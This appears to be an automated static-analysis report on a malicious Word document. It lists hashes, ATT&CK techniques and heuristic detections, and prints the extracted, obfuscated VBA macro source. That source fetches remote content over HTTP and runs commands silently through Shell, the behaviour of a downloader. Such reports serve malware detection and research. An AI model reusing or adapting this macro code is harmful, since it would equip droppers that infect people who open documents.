Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5769f3fc967233b7…

MALICIOUS

Office (OLE)

104.0 KB Created: 2015-07-27 20:08:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: c0b7f52427f1369751927728f09f520c SHA-1: 2d57f03fc4ef2655357aaf1981ebbb00994dd06e SHA-256: 5769f3fc967233b7a76a0247d5a180f63427d03970f7b8789ae3d345d68df1ef
170 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros that utilize `Shell()` and `CreateObject()` calls, indicating an attempt to execute arbitrary code. The VBA script attempts to download content from a URL using `MSXML2.ServerXMLHTTP` and `CreateObject`. The document body presents a lure to encourage macro execution. The presence of `Environ()` calls suggests potential interaction with environment variables.

Heuristics 7

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3554 bytes
SHA-256: 8a499abb5bf0aa9ba72b8cc7b9151cf5e1ca98f44127612f7665f3ca47641c0f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Public Function Xjdkhjfwefw(a As Object)
Xjdkhjfwefw = (a.responseText)
End Function
 





Attribute VB_Name = "Module2"
 
Public Function Goabc(sps As String)
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
Goabc = Environ(sps)
End Function
Public Function Linolium(nbqjbdjqw As String)
Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, VjwiqdhqkwjHJhjkahsdjsakDD As Object, AHUDWQI As String
Dim ashdUHhda As String, hausd As Integer, JQHWDJQWB As String
ashdUHhda = nbqjbdjqw
hausd = Tan(11) + 225
'asdsad
JQHWDJQWB = "E"
JQHWDJQWB = "G" + JQHWDJQWB + Chr(88 + 4 * hausd)
BQDHJQWDGWQJGS = "MS" + Chr(93 + 5 * hausd) + "ML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
'Hukqjdhjksahd
Set VjwiqdhqkwjHJhjkahsdjsakDD = CreateObject(BQDHJQWDGWQJGS)
VjwiqdhqkwjHJhjkahsdjsakDD.Open JQHWDJQWB, ashdUHhda
VjwiqdhqkwjHJhjkahsdjsakDD.Send (AHUDWQI)
Linolium = Module1.Xjdkhjfwefw(VjwiqdhqkwjHJhjkahsdjsakDD)
End Function
Sub Crispy(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub









Attribute VB_Name = "Module3"
 
Public Function India(dnuwhd As String, b As String, c As Integer)
Dim telnasdhS As String
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
Dim kkqhwdjbqhjdwqbdhjqwbdjqsd As Range, aaHRjkasnjkdaksbdasdsd As Range
Set kkqhwdjbqhjdwqbdhjqwbdjqsd = ActiveDocument.Range
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1qhwdjko2ej1l2kje k2l1"
ASJDQDBBBNS = "2jke hjk1g hj12ge1asjdqk2 e1o2ej1l2kje k2l1"
ASJADQDBBBNS = "2jke hjk1g hhdjkqwj12ge1k2 e1o2ej1l2kje k2l1"
AFWSJDQDBBBNS = "2jke hjbasjdk1g hj12ge1k2 e1o2ej1l2kje k2l1"
With kkqhwdjbqhjdwqbdhjqwbdjqsd.Find
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
.Text = dnuwhd
.MatchWholeWord = True
kkqhwdjbqhjdwqbdhjqwbdjqsd.Find.Execute
kkqhwdjbqhjdwqbdhjqwbdjqsd.Collapse direction:=wdCollapseEnd
Dim wdwq As String
Set aaHRjkasnjkdaksbdasdsd = ActiveDocument.Range
Dim wdsadwq As String
aaHRjkasnjkdaksbdasdsd.Start = kkqhwdjbqhjdwqbdhjqwbdjqsd.End
.Text = b
.MatchWholeWord = True
.Execute
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
kkqhwdjbqhjdwqbdhjqwbdjqsd.Collapse direction:=wdCollapseStart
aaHRjkasnjkdaksbdasdsd.End = kkqhwdjbqhjdwqbdhjqwbdjqsd.Start

If (c = 1) Then
    telnasdhS = aaHRjkasnjkdaksbdasdsd.Delete
End If
If (c = 2) Then
    aaHRjkasnjkdaksbdasdsd.Font.Color = wdColorBlack
End If

Dim hduwaa As Integer
hduwaa = 1 - 2 ^ 4

QHUDW = Chr(5 + 5 + 23 + Sgn(hduwaa))

If (c = 3) Then
    With kkqhwdjbqhjdwqbdhjqwbdjqsd.Find
    .Text = a
    .Replacement.Text = QHUDW
    'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
    'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
    'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
    'ASJDQDBBBNS = "2jke hjk1g hj12ge1k2 e1o2ej1l2kje k2l1"
    .Wrap = wdFindContinue
    .Execute Replace:=wdReplaceAll
    End With
End If

End With
End Function

Public Function HowEver(hqwdugqw As Variant, hasdgja)
VHJWDQ = "b2nme2b1 hgj12hg21jhg e"
hqwdugqw = Shell(hasdgja, 0)
HowEver = hqwdugqw
End Function